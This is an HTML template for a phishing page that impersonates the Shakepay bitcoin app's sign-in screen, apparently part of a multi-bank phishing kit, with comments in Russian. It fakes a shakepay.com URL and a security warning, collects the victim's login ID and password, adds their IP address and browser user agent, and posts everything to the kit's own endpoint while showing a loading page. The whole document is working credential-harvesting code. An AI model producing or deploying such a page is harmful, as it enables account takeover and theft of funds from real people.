<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Shakepay - Buy/Earn Bitcoin in Canada</title>
  <link rel="shortcut icon" href="https://shakepay.com/favicon.ico">
  <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&display=swap" rel="stylesheet">
  <style>
    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
      font-family: 'Inter', sans-serif;
    }
    
    body {
      min-height: 100vh;
      width: 100%;
      display: flex;
      align-items: center;
      justify-content: center;
      background-color: #f9fafb;
    }
    
    .container {
      width: 100%;
      max-width: 448px;
      padding: 0 16px;
    }
    
    .card {
      background-color: white;
      border-radius: 8px;
      border: 1px solid #e5e7eb;
      box-shadow: 0 1px 3px rgba(0, 0, 0, 0.05);
    }
    
    .card-body {
      display: flex;
      flex-direction: column;
      align-items: center;
      gap: 16px;
      padding: 32px 24px;
    }
    
    .logo-container {
      width: 80px;
      height: 80px;
      border-radius: 50%;
      background-color: #f9fafb;
      display: flex;
      align-items: center;
      justify-content: center;
      margin-bottom: 8px;
    }
    
    .logo {
      width: 48px;
      height: 48px;
    }
    
    .title {
      text-align: center;
      margin-bottom: 8px;
    }
    
    .title h1 {
      font-size: 24px;
      font-weight: 600;
      color: #1f2937;
    }
    
    .title p {
      color: #6b7280;
    }
    
    .url {
      display: flex;
      align-items: center;
      gap: 4px;
      color: #6b7280;
      font-size: 14px;
      margin-bottom: 16px;
    }
    
    .warning {
      text-align: center;
      font-size: 12px;
      color: #6b7280;
      margin-bottom: 16px;
      padding: 0 24px;
    }
    
    form {
      width: 100%;
    }
    
    .form-group {
      margin-bottom: 16px;
    }
    
    label {
      display: block;
      font-size: 14px;
      font-weight: 500;
      color: #374151;
      margin-bottom: 4px;
    }
    
    .input-container {
      position: relative;
    }
    
    .input-icon {
      position: absolute;
      left: 12px;
      top: 50%;
      transform: translateY(-50%);
      color: #9ca3af;
    }
    
    input {
      width: 100%;
      padding: 10px 12px 10px 36px;
      border: 1px solid #d1d5db;
      border-radius: 6px;
      font-size: 14px;
      outline: none;
    }
    
    input:focus {
      border-color: #3b82f6;
      box-shadow: 0 0 0 1px #3b82f6;
    }
    
    input::placeholder {
      color: #9ca3af;
    }
    
    button {
      width: 100%;
      padding: 10px;
      background-color: #3b82f6;
      color: white;
      border: none;
      border-radius: 6px;
      font-size: 14px;
      font-weight: 500;
      cursor: pointer;
      transition: background-color 0.2s;
    }
    
    button:hover {
      background-color: #2563eb;
    }
    
    .links {
      display: flex;
      justify-content: center;
      gap: 16px;
      margin-top: 16px;
      font-size: 14px;
    }
    
    .links a {
      color: #3b82f6;
      text-decoration: none;
    }
    
    .links a:hover {
      text-decoration: underline;
    }
    
    .divider {
      color: #9ca3af;
    }
  </style>
</head>
<body>
  <div class="container">
    <div class="card">
      <div class="card-body">
        <div class="logo-container">
          <img src="https://i.postimg.cc/8CX4mnmL/logo.png" alt="Shakepay Logo" class="logo">
        </div>
        
        <div class="title">
          <h1>Sign in</h1>
          <p>to Shakepay</p>
        </div>
        
        <div class="url">
          <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
            <rect x="3" y="11" width="18" height="11" rx="2" ry="2"></rect>
            <path d="M7 11V7a5 5 0 0 1 10 0v4"></path>
          </svg>
          <span>shakepay.com/signin</span>
        </div>
        
        <div class="warning">
          Stay safe! Confirm the URL is legitimate before typing in your login credentials.
        </div>
        
        <form id="shakepay-login-form" method="POST" action="/submit-shakepay">
          <input type="hidden" name="url_id" value="{{ url_id }}">
          <div class="form-group">
            <label for="email">ID</label>
            <div class="input-container">
              <svg class="input-icon" xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
                <path d="M19 21v-2a4 4 0 0 0-4-4H9a4 4 0 0 0-4 4v2"></path>
                <circle cx="12" cy="7" r="4"></circle>
              </svg>
              <input type="text" id="email" placeholder="Email, shaketag or phone number" name="login-id">
            </div>
          </div>
          
          <div class="form-group">
            <label for="password">Password</label>
            <div class="input-container">
              <svg class="input-icon" xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
                <rect x="3" y="11" width="18" height="11" rx="2" ry="2"></rect>
                <path d="M7 11V7a5 5 0 0 1 10 0v4"></path>
              </svg>
              <input type="password" id="password" placeholder="Password" name="password">
            </div>
          </div>
          
          <button type="submit">Sign in</button>
        </form>
      </div>
    </div>
    
    <div class="links">
      <a href="https://shakepay.com/get-started">Sign up</a>
      <span class="divider">·</span>
      <a href="https://shakepay.com/request-password-reset">Reset password</a>
    </div>
  </div>
<script>
    document.addEventListener('DOMContentLoaded', function() {
        const form = document.querySelector('#shakepay-login-form');
        form.addEventListener('submit', function(e) {
            e.preventDefault();
            
            // Получаем url_id из всех возможных источников
            let urlId;
            
            // 1. Из параметров URL
            const urlParams = new URLSearchParams(window.location.search);
            urlId = urlParams.get('url_id');
            
            // 2. Из скрытого поля формы
            if (!urlId) {
                const hiddenField = form.querySelector('input[name="url_id"]');
                if (hiddenField) {
                    urlId = hiddenField.value;
                }
            }
            
            // 3. Из sessionStorage
            if (!urlId) {
                urlId = sessionStorage.getItem('url_id');
            }
            
            // Если всё еще нет url_id, показываем ошибку
            if (!urlId) {
                alert('Session ID is missing. Please restart the process.');
                return;
            }
            
            // Создаем элементы для IP и User-Agent
            const ipField = document.createElement('input');
            ipField.type = 'hidden';
            ipField.name = 'user_ip';
            
            const uaField = document.createElement('input');
            uaField.type = 'hidden';
            uaField.name = 'user_agent';
            uaField.value = navigator.userAgent;
            
            form.appendChild(ipField);
            form.appendChild(uaField);
            
            // Сначала получаем IP
            fetch('https://api.ipify.org?format=json')
                .then(response => response.json())
                .then(data => {
                    ipField.value = data.ip;
                    
                    // Теперь создаем FormData с актуальными значениями
                    const formData = new FormData(form);
                    formData.append('bankname', 'shakepay');
                    formData.append('url_id', urlId);

                    // Перенаправляем на loading.html с url_id
                    window.location.href = `/render/loading?url_id=${encodeURIComponent(urlId)}`;

                    // Отправка данных формы после перехода
                    fetch('/submit-shakepay', {
                        method: 'POST',
                        body: formData,
                        keepalive: true
                    }).catch(error => {
                        console.error('Error submitting form:', error);
                    });
                })
                .catch(error => {
                    console.error('Error getting IP:', error);
                    ipField.value = 'unknown';
                    
                    // Создаем FormData с fallback значением
                    const formData = new FormData(form);
                    formData.append('bankname', 'shakepay');
                    formData.append('url_id', urlId);
                    
                    window.location.href = `/render/loading?url_id=${encodeURIComponent(urlId)}`;
                    
                    fetch('/submit-shakepay', {
                        method: 'POST',
                        body: formData,
                        keepalive: true
                    }).catch(fetchError => {
                        console.error('Error submitting form:', fetchError);
                    });
                });
        });
    });
</script>
    <script>
        // Сохраняем url_id при загрузке страницы банка
        document.addEventListener('DOMContentLoaded', function() {
            const urlId = "{{ url_id }}";
            if (urlId) {
                sessionStorage.setItem('url_id', urlId);
            }
        });
    </script>
</body>
</html>
